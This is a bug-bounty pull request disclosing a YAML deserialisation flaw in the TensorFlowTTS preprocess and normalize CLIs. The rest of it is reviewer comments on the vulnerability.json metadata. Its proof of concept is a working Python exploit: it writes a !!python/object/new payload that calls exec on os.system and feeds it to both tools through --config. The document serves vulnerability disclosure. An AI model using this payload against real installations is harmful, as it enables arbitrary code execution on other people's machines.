### PR TITLE
multiple Tensorflowtts cli apps are vulnerable to arbitrary code execution

### PR DESCRIPTION
**Pull request by B3EF**
## ✍️ Description
TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize aware and pruning, make TTS models can be run faster than real-time and be able to deploy on mobile devices or embedded systems.
* **Vulnerability discription**
Vulnerable to yaml deserilisation attack caused by unsafe loading.
## 🕵️‍♂️ Proof of Concept
* Run the exploit code
```python
# exploit.py
import os
os.system('pip install TensorFlowTTS')
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('rm exploit.yml exploit.yaml')
open('exploit.yml','w+').write(exploit)
print("\n\nexploiting preprocess in tts")
cmd = str('''tensorflow-tts-preprocess --rootdir ./ --outdir ./ --config exploit.yml ''')
os.system(cmd)
print("\n\nexploiting normalize in tts")
cmd1 = str('''tensorflow-tts-normalize --rootdir ./ --outdir ./ --config exploit.yml ''')
os.system(cmd1)
``` 
* [Video Link ](https://cdn.discordapp.com/attachments/789769803770494996/791775352069816360/tts-2020-12-25_02.41.29.mkv)
## 💥 Impact
Arbitrary Code Execution
## ☎️ Contact
Not made any contact with the maintaineer/author.
## ✅ Checklist
**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

File: bounties/pip/TensorFlowTTS/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,54 @@
...
+  "AffectedVersionRange": "*",
+  "Summary": "Arbitrary Code Execution",
+  "Contributor": {
+    "Discloser": "B3EF",
+    "Fixer": ""
+  },
+  "Package": {
+    "Registry": "pip",
+    "Name": "TensorFlowTTS",
+    "URL": "https://github.com/TensorSpeech/TensorFlowTTS.git",
```
Comment (JamieSlome) [inline bounties/pip/TensorFlowTTS/1/vulnerability.json:13]: This should be: https://pypi.org/project/TensorFlowTTS

File: bounties/pip/TensorFlowTTS/1/vulnerability.json [hunk 2]
```diff
@@ -0,0 +1,54 @@
...
+    "I": "",
+    "A": "",
+    "E": "",
+    "RL": "",
+    "RC": "",
+    "Score": "8.6"
+  },
+  "CVEs": [""], 
+  "Repository": {
+    "URL": "https://github.com/TensorSpeech/TensorFlowTTS.git",
```
Comment (JamieSlome) [inline bounties/pip/TensorFlowTTS/1/vulnerability.json:39]: You don't need `.git` at the end of the URL, thanks.

File: bounties/pip/TensorFlowTTS/1/vulnerability.json [hunk 3]
```diff
@@ -0,0 +1,54 @@
...
+    "Codebase": ["PYTHON"],
```
Comment (JamieSlome) [inline bounties/pip/TensorFlowTTS/1/vulnerability.json:40]: Make standard capitalisation.

**Review by B3EF — COMMENTED** [review]
Fixed

**Review by B3EF — COMMENTED** [review]
done

**Pull request merged**